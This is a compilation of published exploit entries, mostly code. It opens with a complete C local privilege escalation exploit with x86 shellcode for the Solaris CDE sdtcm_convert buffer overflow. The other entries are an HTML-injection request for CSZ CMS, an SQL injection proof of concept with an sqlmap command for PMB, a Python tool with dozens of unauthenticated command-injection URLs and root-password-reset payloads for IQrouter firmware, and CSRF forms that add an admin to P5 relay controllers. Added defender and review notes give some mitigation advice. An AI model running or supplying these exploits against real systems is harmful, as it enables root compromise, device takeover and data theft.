
-
Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation
# Title: Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation # Date: 2020-04-21 # Author: Marco Ivaldi # Vendor: www.oracle.com # CVE: CVE-2020-2944 /* * raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel * Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info> * * A buffer overflow in the _SanityCheck() function in the Common Desktop * Environment version distributed with Oracle Solaris 10 1/13 (Update 11) and * earlier allows local users to gain root privileges via a long calendar name * or calendar owner passed to sdtcm_convert in a malicious calendar file * (CVE-2020-2944). * * The open source version of CDE (based on the CDE 2.x codebase) is not * affected, because it does not ship the vulnerable binary. * * "CDE, the gift that keeps on giving" -- @0xdea * "Feels more like a curse you can't break from this side." -- @alanc * * This exploit uses the ret-into-ld.so technique to bypass the non-exec stack * protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory * space, try returning to sprintf() instead of strcpy(). * * I haven't written a Solaris/SPARC version because I don't have a SPARC box * on which Solaris 10 can run. If anybody is kind enough to give me access to * such a box, I'd be happy to port my exploit to Solaris/SPARC as well. * * Usage: * $ gcc raptor_sdtcm_conv.c -o raptor_sdtcm_conv -Wall * $ ./raptor_sdtcm_conv * [...] * Do you want to correct it? (Y/N) [Y] n * # id * uid=0(root) gid=1(other) egid=12(daemon) * # * * This should work with any common configuration on the first try. 
 * To re-enable rpc.cmsd, clear its service maintenance status by running the
 * following commands as root:
 * # /usr/sbin/svcadm clear cde-calendar-manager
 * # /usr/bin/svcs -a | grep calendar
 * online 13:16:54 svc:/network/rpc/cde-calendar-manager:default
 *
 * Tested on:
 * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
 * [previous Solaris versions are also likely vulnerable]
 *
 * Defender notes (artifacts visible in the code below):
 * - a calendar "hax0r@<hostname>" is created through "sdtcm_admin -a -c" and
 *   /usr/spool/calendar/callog.hax0r is rewritten with a ~2 KB "Calendar Name"
 *   attribute made of repeated 16-byte address frames;
 * - /usr/dt/bin/sdtcm_convert is then exec'd with argv[1] = "hax0r" and an
 *   environment whose first entry is a 1 KB NOP-padded string;
 * - the cde-calendar-manager service ends up in maintenance (see above).
 * The fix is the vendor patch for CVE-2020-2944; where CDE calendaring is not
 * needed, leaving the service disabled removes the exposure.
 */

/* dlmopen()/dlinfo()/dlsym() and Link_map are presumably provided through
 * <link.h>, and strlen()/memset()/memcpy() through <strings.h> on Solaris —
 * TODO confirm; a non-Solaris build would need <dlfcn.h> and <string.h>. */
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/systeminfo.h>
#include <sys/types.h>

#define INFO1 "raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel"
#define INFO2 "Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>"

#define VULN "/usr/dt/bin/sdtcm_convert" // the vulnerable program
#define ADMIN "/usr/dt/bin/sdtcm_admin" // calendar admin utility
#define BUFSIZE 2304 // size of the name/owner
#define PAYSIZE 1024 // size of the payload
/* offset to the shellcode; expands unparenthesized to "env_len / 2" and is
 * only used in "sb - OFFSET", where precedence keeps that correct */
#define OFFSET env_len / 2

char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
/* double setuid() */
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
/* execve() */
"\x31\xc0\x50\x68/ksh\x68/bin"
"\x89\xe3\x50\x53\x89\xe2\x50"
"\x52\x53\xb0\x3b\x50\xcd\x91";

/* globals */
char *env[256];              /* envp handed to execve(); filled by add_env() */
int env_pos = 0, env_len = 0; /* next free env[] slot / running byte length */

/* prototypes */
int add_env(char *string);
void check_zero(int addr, char *pattern);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);

/*
 * main(): build the calendar file, then exec the vulnerable program.
 *
 * Takes no arguments (any argument prints usage and exits 1).  Returns only
 * through exit(); note that the exit status after a failed execve() is 0.
 */
int main(int argc, char **argv)
{
	char buf[BUFSIZE], payload[PAYSIZE];
	char platform[256], release[256], hostname[256];
	int i, payaddr;
	char *arg[3] = {"foo", "hax0r", NULL};
	/* pointer truncated to int: assumes a 32-bit process */
	int sb = ((int)argv[0] | 0xfff); /* stack base */
	int ret = search_ldso("strcpy"); /* or sprintf */
	int rwx_mem = search_rwx_mem(); /* rwx memory */
	char cmd[1024];
	FILE *fp;

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* read command line */
	if (argc != 1) {
		fprintf(stderr, "Usage:\n%s\n[...]\n", argv[0]);
		fprintf(stderr, "Do you want to correct it? (Y/N) [Y] n\n\n");
		exit(1);
	}

	/* get system information; return values are not checked, and the
	 * SI_HOSTNAME call is bounded by sizeof(release) rather than
	 * sizeof(hostname) (both are 256, so harmless but inconsistent) */
	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
	sysinfo(SI_HOSTNAME, hostname, sizeof(release) - 1);

	/* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff):
	 * PAYSIZE bytes of 0x90 with sc (including its NUL) at the very end */
	memset(payload, '\x90', PAYSIZE);
	payload[PAYSIZE - 1] = 0x0;
	memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc));

	/* fill the envp, keeping padding */
	add_env(payload);
	add_env("HOME=/tmp");
	add_env(NULL);

	/* calculate the payload address */
	payaddr = sb - OFFSET;

	/* prepare the evil calendar name: all 'A', NUL-terminated */
	memset(buf, 'A', sizeof(buf));
	buf[sizeof(buf) - 1] = 0x0;

	/* fill with function address in ld.so.1, saved eip, and arguments.
	 * Each pass writes one 16-byte frame; i is also advanced inside the
	 * set_val() calls, so the loop steps by 16 and the last frame ends
	 * at index 2287 (< BUFSIZE - 1). */
	for (i = 0; i < BUFSIZE - 16; i += 4) {
		set_val(buf, i, ret); /* strcpy */
		set_val(buf, i += 4, rwx_mem); /* saved eip */
		set_val(buf, i += 4, rwx_mem); /* 1st argument */
		set_val(buf, i += 4, payaddr); /* 2nd argument */
	}

	/* print some output */
	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
	fprintf(stderr, "Using SI_HOSTNAME\t: %s\n", hostname);
	fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
	fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
	fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr);
	fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);

	/* create the evil calendar file.  hostname is interpolated into a
	 * shell command line; system() returning -1 only covers a failure
	 * to spawn the shell, not a non-zero exit of sdtcm_admin. */
	fprintf(stderr, "Preparing the evil calendar file... ");
	snprintf(cmd, sizeof(cmd), "%s -a -c hax0r@%s", ADMIN, hostname);
	if (system(cmd) == -1) {
		perror("Error creating calendar file");
		exit(1);
	}
	if (chmod("/usr/spool/calendar/callog.hax0r", 0660) == -1) {
		perror("Error creating calendar file");
		exit(1);
	}

	/* prepare the evil calendar file (badchars currently not handled) */
	fp = fopen("/usr/spool/calendar/callog.hax0r", "w");
	if (!fp) {
		perror("Error preparing calendar file");
		exit(1);
	}
	fprintf(fp, "Version: 4\n(calendarattributes "
	    "(\"-//XAPIA/CSA/CALATTR//NONSGML Access List//EN\","
	    "\"10:access_list\",\"world:2\")\n");

	/* buffer overflow in calendar name */
	fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\","
	    "\"5:string\",\"%s\")\n", buf);
	fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\","
	    "\"6:user\",\"fnord\")\n)");

	/* buffer overflow in calendar owner (alternative, kept disabled) */
	/*
	fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\","
	    "\"5:string\",\"hax0r\")\n");
	fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\","
	    "\"6:user\",\"%s\")\n)", buf);
	*/
	fclose(fp); /* return value (flush errors) not checked */
	fprintf(stderr, "Done.\n");

	/* run the vulnerable program with the crafted envp */
	fprintf(stderr, "Exploiting... Please answer \"n\" when prompted.\n");
	execve(VULN, arg, env);
	perror("execve");
	exit(0); /* reached only if execve() failed; status is still 0 */
}

/*
 * add_env(): add a variable to envp and pad if needed
 *
 * string: NUL-terminated entry to append, or NULL to terminate env[].
 * Returns the running byte length of the environment built so far.
 * Padding: when strlen(string) + 1 is not a multiple of 4, extra env[]
 * slots pointing at the string's terminating NUL (i.e. empty strings) are
 * appended so that every entry starts on a 4-byte boundary.  There is no
 * bounds check against the 256-slot env[] array.
 */
int add_env(char *string)
{
	int i;

	/* null termination */
	if (!string) {
		env[env_pos] = NULL;
		return env_len;
	}

	/* add the variable to envp */
	env[env_pos] = string;
	env_len += strlen(string) + 1;
	env_pos++;

	/* pad the envp using zeroes */
	if ((strlen(string) + 1) % 4)
		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
			env[env_pos] = string + strlen(string);
			env_len++;
		}

	return env_len;
}

/*
 * check_zero(): check an address for the presence of a 0x00
 *
 * Exits with status 1, naming pattern, if any of the four bytes of addr is
 * zero (a NUL byte would cut the string-based copy short).
 */
void check_zero(int addr, char *pattern)
{
	if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
	    !(addr & 0xff000000)) {
		fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
		exit(1);
	}
}

/*
 * search_ldso(): search for a symbol inside ld.so.1
 *
 * Returns the address of sym in the runtime linker's own link map, after
 * checking that addr - 4 contains no zero byte.  Exits on any failure.
 * The Link_map obtained from dlinfo() is not used afterwards, and the
 * int-vs-NULL comparison on the dlsym() result is a type mismatch that
 * compilers typically warn about.
 */
int search_ldso(char *sym)
{
	int addr;
	void *handle;
	Link_map *lm;

	/* open the executable object file */
	if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
		perror("dlopen");
		exit(1);
	}

	/* get dynamic load information */
	if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
		perror("dlinfo");
		exit(1);
	}

	/* search for the address of the symbol */
	if ((addr = (int)dlsym(handle, sym)) == NULL) {
		fprintf(stderr, "Sorry, function %s() not found\n", sym);
		exit(1);
	}

	/* close the executable object file */
	dlclose(handle);

	check_zero(addr - 4, sym);
	return addr;
}

/*
 * search_rwx_mem(): search for an RWX memory segment valid for all
 * programs (typically, /usr/lib/ld.so.1) using the proc filesystem
 *
 * Walks /proc/<pid>/map and returns the start address of the second-to-last
 * matching mapping, with zero low bytes bumped to 0x04/0x0400.  Caveats
 * visible in the code: the mask test "pr_mflags & (MA_READ|MA_WRITE|MA_EXEC)"
 * is true when ANY of the three flags is set, not only for RWX mappings;
 * addr_old is assigned only inside the loop, so it is read uninitialized if
 * fewer than two mappings match; read() returning -1 is truthy and keeps the
 * loop going; and tmp[16] holds "/proc/<pid>/map" only for a pid of at most
 * five digits.
 */
int search_rwx_mem(void)
{
	int fd;
	char tmp[16];
	prmap_t map;
	int addr = 0, addr_old;

	/* open the proc filesystem */
	sprintf(tmp,"/proc/%d/map", (int)getpid());
	if ((fd = open(tmp, O_RDONLY)) < 0) {
		fprintf(stderr, "Can't open %s\n", tmp);
		exit(1);
	}

	/* search for the last RWX memory segment before stack (last - 1) */
	while (read(fd, &map, sizeof(map)))
		if (map.pr_vaddr)
			if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
				addr_old = addr;
				addr = map.pr_vaddr;
			}
	close(fd);

	/* add 4 to the exact address NULL bytes */
	if (!(addr_old & 0xff))
		addr_old |= 0x04;
	if (!(addr_old & 0xff00))
		addr_old |= 0x0400;

	return addr_old;
}

/*
 * set_val(): copy a dword inside a buffer (little endian)
 *
 * Writes the four bytes of val at buf[pos] .. buf[pos + 3], least
 * significant byte first.  No bounds check: the caller must guarantee
 * pos + 3 is inside buf.
 */
void set_val(char *buf, int pos, int val)
{
	buf[pos] = (val & 0x000000ff);
	buf[pos + 1] = (val & 0x0000ff00) >> 8;
	buf[pos + 2] = (val & 0x00ff0000) >> 16;
	buf[pos + 3] = (val & 0xff000000) >> 24;
}
-
CSZ CMS 1.2.7 - 'title' HTML Injection
# Exploit Title: CSZ CMS 1.2.7 - 'title' HTML Injection
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/
# Version: v1.2.7
# Description:
# An authenticated user can inject a hyperlink into the Backend System Dashboard and
# Member Dashboard via a message.

PoC Request:

POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Cookie: cszcookie
Connection: close
Upgrade-Insecure-Requests: 1

csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=<h1><b><a href="http://changeme/">Please click to view</a></b></h1>&message=phishing&submit=Send
-
PMB 5.6 - 'logid' SQL Injection
# Exploit Title: PMB 5.6 - 'logid' SQL Injection
# Google Dork: inurl:opac_css
# Date: 2020-04-20
# Exploit Author: 41-trk (Tarik Bakir)
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 5.6

-==== Software Description ====-

PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. We are some librarians, users and developers deploring this state of affairs. PMB is based on web technology. This is what we sometimes call a 'web-app'. PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language.

The main functions of PMB are :
* Supporting the UNIMARC format
* Authorities management (authors, publishers, series, subjects...)
* Management of loans, holds, borrowers...
* A user-friendly configuration
* The ability to import full bibliographic records
* A user-friendly OPAC integrating a browser
* Loans management with a module designed to serve even the very small establishments
* Serials management
* Simple administration procedures that can be handled easily even by the library staff...

-==== Vulnerability ====-

The $logid variable isn't properly sanitized in the file /admin/sauvegarde/download.php, which allows a user holding ADMINISTRATION_AUTH to execute arbitrary SQL commands via the id parameter.

-==== POC ====-

http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1 [SQLI]

Using SQLMAP :
./sqlmap.py -u "http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1" -p logid --headers="Cookie: [VALID_USER_COOKIE]" --passwords

-==== Exploit requirements ====-

- You need to be logged in to exploit the vulnerability.
-
IQrouter 3.3.1 Firmware - Remote Code Execution
# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution
# Date: 2020-04-21
# Exploit Author: drakylar
# Vendor Homepage: https://evenroute.com/
# Software Link: https://evenroute.com/iqrouter
# Version: IQrouter firmware up to 3.3.1
# Tested on: IQrouter firmware 3.3.1
# CVE : N/A

#!/usr/bin/env python3
import argparse
from sys import argv, exit  # argv is imported but never used below

# A missing requests module is only reported here; execution continues and
# the later requests.get() call would then fail with a NameError.
try:
    import requests
except ImportError:
    print("Install requests lib! pip3 install requests")

print("""
#######################################################################
# IQrouter multiple RCE and other vulnerabilities #
# by drakylar (Shaposhnikov Ilya) #
# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 #
# CVE-2020-11967 CVE-2020-11968 #
#######################################################################
""")

# Each entry is [url_template, description].  The template's "{}" is filled
# with the --cmd value by str.format() in main(); every template below is a
# relative path under /cgi-bin/luci/er/, which is the surface a defender
# would watch for (a request-log filter on backticks or "${IFS}" inside these
# paths catches the whole family).
#
# Entries that only apply while the router is in setup mode.
rce_setup = [
    ["/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'", "RCE /vlanTag (vlan_tag param)"],
    ["/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'", "RCE /verify_wifi (wifi_conflict param). Need hide_wifi_config != true"],
    ["/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2", "RCE /screen9 (s2 param)"],
    ["/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2", "RCE /screen9 (s1 param)"],
    ["/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'", "RCE /screen9 (p2 param)"],
    ["/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2", "RCE /screen9 (p1 param)"],
    # NOTE(review): this template lacks the closing single quote the others have
    ["/cgi-bin/luci/er/screen4?save_isp='`{}`", "RCE /screen4 (save_isp param)"],
    ["/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'", "RCE /screen2 set_wan_modem_interfaces param)"],
    ["/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'", "RCE /screen2 find_ip_address_conflict param)"],
    ["/cgi-bin/luci/er/screen10?set_security_question='`{}`'", "RCE /screen10 (set_security_question param)"],
    ["/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1", "RCE /screen10 (set_security_answer param)"],
    ["/cgi-bin/luci/er/screen1?zonename='`{}`'", "RCE /screen1 (zonename param)"],
    ["/cgi-bin/luci/er/register?email=`{}`", "RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)"]
]

# Entries the author lists as usable without authentication.
rce_any = [
    ["/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1", "RCE /wifi (s2 param)"],
    ["/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7", "RCE /wifi (s1 param)"],
    ["/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'", "RCE /wifi (p2 param)"],
    ["/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4", "RCE /wifi (p1 param)"],
    ["/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", "RCE /wifi (guestwifi_5g_ssid param)"],
    ["/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", "RCE /wifi (guestwifi_2g_ssid param)"],
    ["/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", "RCE /wifi (guest_key param)"],
    ["/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7", "RCE /wifi (enable_guestwifi param)"],
    # NOTE(review): "®ister" looks like "&register" mangled by HTML entity
    # decoding ("&reg" -> "®") when the listing was published — verify against
    # the original source before relying on this entry.
    ["/cgi-bin/luci/er/screen11.1?email=`{}`®ister=123&uilog=123&bg=123", "RCE /screen11.1 (email param)"],
    ["/cgi-bin/luci/er/reboot_link?link='`{}`'", "RCE /reboot_link (link param)"],
    ["/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/", "RCE /diag_wifi (htm5ghz param)"],
    ["/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/", "RCE /diag_wifi (htm2ghz param)"],
    ["/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/", "RCE /diag_wifi (c5ghz param)"],
    ["/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/", "RCE /diag_wifi (c2ghz param)"],
    ["/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/", "RCE /diag_set_static_wan (static_ip param)"],
    ["/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/", "RCE /diag_set_static_wan (net_mask param)"],
    ["/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/", "RCE /diag_set_static_wan (gateway param)"],
    ["/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/", "RCE /diag_set_static_wan (dns param)"],
    ["/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/", "RCE /diag_set_static_modem (static_ip param)"],
    ["/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/", "RCE /diag_set_static_modem (net_mask param)"],
    ["/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/", "RCE /diag_set_static_modem (gateway param)"],
    ["/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/", "RCE /diag_set_device_name_and_sync (device_name param)"],
    ["/cgi-bin/luci/er/diag_set_device_name/'`{}`'/", "RCE /diag_set_device_name (device_name param)"],
    ["/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/", "RCE /diag_pppoe_update (wan_username param)"],
    ["/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/", "RCE /diag_pppoe_update (wan_password param)"],
    ["/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/", "RCE /diag_pppoe (wan_username param)"],
    ["/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/", "RCE /diag_pppoe (wan_password param)"],
    ["/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/", "RCE /diag_pppoa_update (wan_username param)"],
    ["/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/", "RCE /diag_pppoa_update (wan_password param)"],
    ["/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/", "RCE /diag_pppoa (wan_username param)"],
    ["/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/", "RCE /diag_pppoa (wan_password param)"],
    ["/cgi-bin/luci/er/advanced_link?link='`{}`'", "RCE /advanced_link (link param)"]
]

# Non-RCE actions; these templates contain no "{}", so --cmd is ignored for them.
advanced_payloads = [
    ["/cgi-bin/luci/er/reboot_link?reboot=1", "Reboot IQrouter (/reboot_link reboot param))"],
    ["/cgi-bin/luci/er/screen2?reboot=1", "Reboot IQrouter (/screen2 reboot param))"],
    ["/cgi-bin/luci/er/index?reset_config=1", "Reset IQrouter (/index reset_config param)"],
    ["/cgi-bin/luci/er/screen7?upgrade=1", "Upgrade IQrouter (/screen7 upgrade param)"],
    ["/cgi-bin/luci/er/vlanTag?restart_network=1", "Restart network (/vlanTag restart_network param)"],
    ["/cgi-bin/luci/er/diag_iperf_cmd/start", "Start iperf script (/diag_iperf_cmd/start)"],
    ["/cgi-bin/luci/er/diag_iperf_cmd/stop", "Stop iperf script (/diag_iperf_cmd/stop)"],
    ["/cgi-bin/luci/er/get_syslog", "Router setup info log (/get_syslog)"],
    ["/cgi-bin/luci/er/diag_set_password/c00lpasswd/", "Change root password to c00lpasswd (can change in code)"],
    ["/cgi-bin/luci/er/reset_password/", "Change root password to 'changeme' (static)"]
]


def print_payloads() -> None:
    """Print every payload description with a running number.

    NOTE(review): the numbers printed here (rce_any, then rce_setup, then
    advanced_payloads) do not match the order main() indexes with --num,
    which is rce_setup + rce_any + advanced_payloads.  Picking a number
    from this listing therefore selects a different entry than shown.
    """
    print('#' * 30)
    print("Payloads list")
    num = 1
    print('######################### RCE without auth ########################')
    for payload in rce_any:
        print("{} - {}".format(num, payload[1]))
        num += 1
    print(
        '############### RCE (router need to be in setup mode) ###############')
    for payload in rce_setup:
        print("{} - {}".format(num, payload[1]))
        num += 1
    print(
        '######################### Advanced payloads #########################')
    for payload in advanced_payloads:
        print("{} - {}".format(num, payload[1]))
        num += 1


# Command line is parsed at import time; main() reads the module-level args.
parser = argparse.ArgumentParser(description="IQrouter multiple RCE")
parser.add_argument('--host', help='Host', type=str)
parser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int)
parser.add_argument('-n', '--num', help='Payload number', default=0, type=int)
parser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)', default="pwd", type=str)
parser.add_argument('--protocol', help='Protocol (http/https)', default="http", type=str)
args = parser.parse_args()


def main() -> None:
    """Validate the arguments, build the URL for the chosen entry and send one GET.

    Validation failures are signalled by raising IndexError internally, which
    prints the help plus the payload list and exits with status 1.  The
    default --num of 0 always takes that path.  On success the HTTP status
    code is printed and None is returned (so the caller's exit(main()) exits 0).
    --host is not validated: a missing value is formatted into the URL as "None".
    """
    print("")
    full_payload_list = rce_setup + rce_any + advanced_payloads
    payloads_amount = len(full_payload_list)
    try:
        hostname = args.host
        port = args.port
        payload_num = int(args.num)
        bash_cmd = args.cmd
        protocol = args.protocol
        if payload_num < 1 or payload_num > payloads_amount:
            print("Error with payload number!")
            raise IndexError
        if port < 0 or port > 65535:
            print("Error with port number")
            raise IndexError
        if protocol not in ['http', 'https']:
            print("Error with protocol name")
            raise IndexError
        current_payload = full_payload_list[payload_num - 1]
        print("Payload: {}".format(current_payload[1]))
        print("Host: {}".format(hostname))
        print("Port: {}".format(port))
        print("Protocol: {}".format(protocol))
        print("Command: {}".format(bash_cmd))
        # bash_cmd is substituted verbatim into the template's "{}"
        full_url = "{}://{}:{}{}".format(protocol, hostname, port, current_payload[0].format(bash_cmd))
        print("Built URL: {}".format(full_url))
        r = requests.get(full_url)  # no timeout; a silent target blocks here
        print("Status code: {}".format(r.status_code))
        return
    except IndexError:
        parser.print_help()
        print_payloads()
        exit(1)


if __name__ == '__main__':
    print(
        "\n\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.")
    exit(main())
-
P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)
# Exploit Title: P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin) # Google Dork:jizhicms # Date: 2020-04-18 # Exploit Author: iej1ctk1g # Product web page: https://www.p5.hu # Affected version: 1.0.20, 1.0.11 # CVE : N/A <!-- P5 FNIP-8x16A/FNIP-4xSH CSRF Stored Cross-Site Scripting Vendor: P5 Product web page: https://www.p5.hu Affected version: 1.0.20, 1.0.11 Summary: The FNIP-8x16A is an eight channel relay module used for switching any type of load that doesn’t exceed the specifications. Via its built-in web site and TCP/IP communication, the outputs and inputs can be controlled and monitored from standard network capable devices such as computers, smartphones, web-tablets, etc. either locally or via the network. The module can be used independently or as part of a complex control system in residential and commercial installations. Desc: The controller suffers from CSRF and XSS vulnerabilities. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Input passed to several GET/POST parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. 
Tested on: Linux CGI

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2020-5564
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5564.php

29.01.2020
-->

<!-- Review note: each form below is an ordinary cross-origin POST carrying no
     per-session token, which is the condition the advisory describes. The
     usual fix is a server-side anti-CSRF token validated by user.cgi and
     config.html (SameSite cookies add a second layer), plus HTML-encoding of
     the lab* values on output for the XSS case. -->

<!-- CSRF add admin user -->
<html>
<body>
<form action="http://192.168.1.17:83/user.cgi" method="POST">
<input type="hidden" name="uno" value="1" /> <!-- User number (user1) -->
<input type="hidden" name="un" value="testingus" /> <!-- Username -->
<input type="hidden" name="role" value="2" /> <!-- 2: Admin, 1: Actor, 0: Observer -->
<input type="hidden" name="enabled" value="1" />
<input type="hidden" name="pw" value="123456" />
<input type="hidden" name="pw2" value="123456" />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>

<!-- CSRF change admin password -->
<html>
<body>
<form action="http://192.168.1.17:83/user.cgi" method="POST">
<input type="hidden" name="un" value="admin" /> <!-- Defaults: admin:futurenow -->
<input type="hidden" name="pw" value="123456" />
<input type="hidden" name="pw2" value="123456" />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>

